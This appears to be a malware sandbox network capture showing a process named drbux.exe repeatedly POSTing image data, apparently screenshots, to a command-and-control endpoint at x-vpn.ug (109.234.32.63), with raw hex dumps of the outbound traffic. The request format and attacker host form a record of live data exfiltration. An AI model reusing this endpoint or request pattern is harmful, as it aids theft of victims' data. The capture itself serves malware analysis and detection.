Aug 20, 2021 17:10:49.215893984 CEST	10029	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:49.215964079 CEST	10037	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:49.216021061 CEST	10040	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:10:49.216088057 CEST	10049	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:49.216114998 CEST	10052	OUT	Data Raw: 38 53 69 41 a0 42 8e b4 e1 de 9b 4b 4d 08 5a 28 a5 a6 48 b8 a4 c5 28 14 a0 62 9d 80 6e 28 a5 34 94 02 0a 29 28 a4 01 4b 45 21 a0 05 a5 14 0a 29 80 b4 b4 94 a2 98 85 a3 34 94 50 84 3b 34 0e b4 0a 33 54 03 a8 a6 e6 81 41 36 16 96 92 8a 00 5a 28 a0 Data Ascii: 8SiABKMZ(H(bn(4)(KE!)4P;43TA6Z(SE-%-14JZ8ST!iE6UQIK@hU8STc/iEYGZm(4GN&iiLKf4j,L38)-4h&-$`4+
Aug 20, 2021 17:10:49.242023945 CEST	10055	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:49.242088079 CEST	10063	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:10:49.296236038 CEST	10111	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:49 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49729	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:53.315785885 CEST	10112	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:53.315877914 CEST	10112	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:53.346084118 CEST	10122	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:53.346360922 CEST	10125	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:53.372345924 CEST	10150	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:53.398188114 CEST	10153	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:53.398258924 CEST	10156	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:10:53.398394108 CEST	10172	OUT	Data Raw: 7c 77 37 5a 9d 85 9c b2 c2 6e 21 b5 b8 69 04 b2 a0 04 82 36 a1 55 dd 83 b4 33 29 3c 76 20 9d 24 d7 ec 4e 8b a7 68 0f 77 04 70 9b 1b 9b 69 af a3 b6 3e 65 bc 8d 34 8e a4 3e d1 21 8d 97 68 65 1c 6d 73 c6 78 a2 df 54 d1 a6 9c ea d7 37 56 6c 1f 4b 16 Data Ascii: \|w7Zn!i6U3)<v $Nhwpi>e4>!hemsxT7VlKuK)8<hX(6wp2^?OKO&zhWO-Y;fH>,bll?6;J=^Zmh~4i@`v0wv{c5JZpjrj]%P\Y
Aug 20, 2021 17:10:53.398484945 CEST	10191	OUT	Data Raw: a4 ef 45 50 85 cd 19 a4 a5 a0 42 8a 53 49 45 31 0b 4e 14 c1 4e 14 21 31 d4 52 66 82 6a 85 61 d4 b4 c0 69 d4 c4 2d 28 a4 14 0e b4 c4 3a 8c e2 92 90 d3 10 99 c9 a9 16 98 b5 20 a4 86 c7 51 45 21 ab e8 40 b4 ea 8c 53 a8 06 3e 8a 41 d2 96 a8 91 45 38 Data Ascii: EPBSIE1NN!1Rfjai-(: QE!@S>AE8Sij:SLiE4(SE:KL)%IKU4Q@Jb3I@qONNMPRP)qQRi4-8RNJ.)@ LR)J8v)SH\S@Dn)SFqbM
Aug 20, 2021 17:10:53.398562908 CEST	10201	OUT	Data Raw: 87 ce 83 fb 4b 4e 93 53 82 23 2c da 6a 3b 99 d0 01 96 19 d9 e5 96 51 92 54 39 23 04 63 20 8a a5 fd 83 78 7c 34 75 ef dd 7d 90 4f e4 ed dd f3 ff 00 bf 8f ee e4 85 ce 7a 9a 96 e3 25 66 52 52 4e e8 f5 7b 9f 8f 1a 6d e9 3f 6a f0 2d ac f9 eb e6 dd 2b Data Ascii: KNS#,j;QT9#c x\|4u}Oz%fRRN{m?j-+8n%O*h#gweNBms4G'MQ0R21g56k,rX$~"\|DOGiN[ O6~j>4K^fo^X
Aug 20, 2021 17:10:53.424113035 CEST	10207	OUT	Data Raw: 35 17 1d 8f 8a 69 68 a2 ac 47 dc f5 c1 f8 df c6 f7 ba 66 a5 6d e1 ef 0f 5a 1b cd 72 ef 84 41 8c 20 c6 72 73 c0 00 72 49 ff 00 f5 77 95 e5 be 16 f2 ff 00 e1 77 f8 97 ed 58 fb 5f d9 3f d1 b7 75 f2 fc d3 bb 1f f8 ed 66 50 7f c2 2d f1 3f c9 fb 57 fc Data Ascii: 5ihGfmZrA rsrIwwX_?ufP-?W%Vkb_+>+[7+x:a3#G-O_e _(X6l9zs+?Jiu\:] DXqe-r8Ftv
Aug 20, 2021 17:10:53.451421022 CEST	10209	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:53 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49730	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:53.727899075 CEST	10210	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:53.728089094 CEST	10210	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:53.728344917 CEST	10220	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:53.728414059 CEST	10223	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:53.754333019 CEST	10226	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:53.754414082 CEST	10239	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:53.754529953 CEST	10248	OUT	Data Raw: 48 e1 4b 49 45 32 47 53 87 4a 68 a0 50 21 e0 d2 d3 69 41 a0 43 85 3a 99 9a 50 69 92 3e 9c 0d 47 9a 70 34 08 90 1a 70 35 18 34 ec fa 53 21 a2 50 69 e1 aa 10 69 e0 d3 21 a2 70 d4 e0 41 ea 33 50 83 4e 06 95 88 68 79 85 1b b6 29 bf 65 cf 43 4a 0d 48 Data Ascii: HKIE2GSJhP!iAC:Pi>Gp4p54S!Pii!pA3PNhy)eCJH.;Sv`z4m6O]LljKy~z+Th4Q&EBsGjU"(aKgY{WXm9t\|7hg*NERhzWgsd+O(IsT\eR+Zb%Ntj&`w6
Aug 20, 2021 17:10:53.780481100 CEST	10251	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:53.780635118 CEST	10268	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:10:53.780730963 CEST	10289	OUT	Data Raw: 15 6c 1f de 7a 98 cd 71 8f e4 7a a7 8a 79 d4 93 fd c1 58 24 56 f7 8a 7f e4 24 bf ee 0a c2 ac 30 9f c1 89 38 df e3 48 66 29 40 a5 a5 c5 74 9c 96 19 b6 9e 05 18 a5 02 81 a8 80 14 f0 29 00 a7 81 52 d9 69 0c c7 34 e0 29 c1 72 6a 40 bc f4 a9 6c d1 44 Data Ascii: lzqzyX$V$08Hf)@t)Ri4)rj@lDhSmlD@SOPOFOpLSgC5"iD~k7$k20us&r5&U&'p*AbufQe)WF?1vxCe^A\|NWl
Aug 20, 2021 17:10:53.780782938 CEST	10299	OUT	Data Raw: 87 ce 83 fb 4b 4e 93 53 82 23 2c da 6a 3b 99 d0 01 96 19 d9 e5 96 51 92 54 39 23 04 63 20 8a a5 fd 83 78 7c 34 75 ef dd 7d 90 4f e4 ed dd f3 ff 00 bf 8f ee e4 85 ce 7a 9a 96 e3 25 66 52 52 4e e8 f5 7b 9f 8f 1a 6d e9 3f 6a f0 2d ac f9 eb e6 dd 2b Data Ascii: KNS#,j;QT9#c x\|4u}Oz%fRRN{m?j-+8n%O*h#gweNBms4G'MQ0R21g56k,rX$~"\|DOGiN[ O6~j>4K^fo^X
Aug 20, 2021 17:10:53.834372997 CEST	10307	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:53 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49731	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:54.120488882 CEST	10308	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:54.120579958 CEST	10308	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:54.120770931 CEST	10318	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:54.120853901 CEST	10321	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:54.146502018 CEST	10323	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:54.146593094 CEST	10329	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:54.146653891 CEST	10334	OUT	Data Raw: 3d 88 c1 fd 2b dc bc 03 6f 06 9d e0 6b 69 ff 00 e7 a2 bc f2 b0 19 27 93 fc 80 02 bc a8 f8 23 c4 a3 fe 61 33 fe 6b fe 35 e8 5f 0e f5 8f b2 db bf 86 b5 2f dc 5f 5b 39 f2 e3 72 32 ca 7e 62 3e a3 27 8f 7f 6a e9 cc e7 0a d4 7f 75 24 ec ee ec fa 1c 79 Data Ascii: =+oki'#a3k5_/_[9r2~b>'ju$yd'FbSW7"O&X<Me4yE2g&z2@ureHykrp?lu1nX^AnQ^{o]5X&l#^Zj
Aug 20, 2021 17:10:54.146704912 CEST	10340	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:54.146739960 CEST	10346	OUT	Data Raw: df d4 a3 45 14 77 af 59 1e 08 b4 94 b4 94 31 09 48 69 68 a0 61 4b 48 29 68 40 14 b4 94 b4 08 50 69 69 29 69 89 85 2d 25 2d 50 85 14 ea 68 a5 a0 4c 5a 5a 4a 51 4c 41 4b 49 45 30 1d 45 25 14 c4 2d 14 51 40 85 a2 8a 29 80 b4 e1 4d 14 a0 d3 42 1f 4b Data Ascii: EwY1HihaKH)h@Pii)i-%-PhLZZJQLAKIE0E%-Q@)MBKMW$p4`U\E-1<1@4hIx`iRd8pLPkE6C4znfFp&+892j)ajX=89kfHtOzdOH&nH>Qu*60
Aug 20, 2021 17:10:54.174046993 CEST	10349	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:54.174165964 CEST	10360	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:10:54.227813959 CEST	10405	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:54 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49732	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:54.558459044 CEST	10406	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:54.558753014 CEST	10406	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:54.559252977 CEST	10416	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:54.559520006 CEST	10419	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:54.585299969 CEST	10422	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
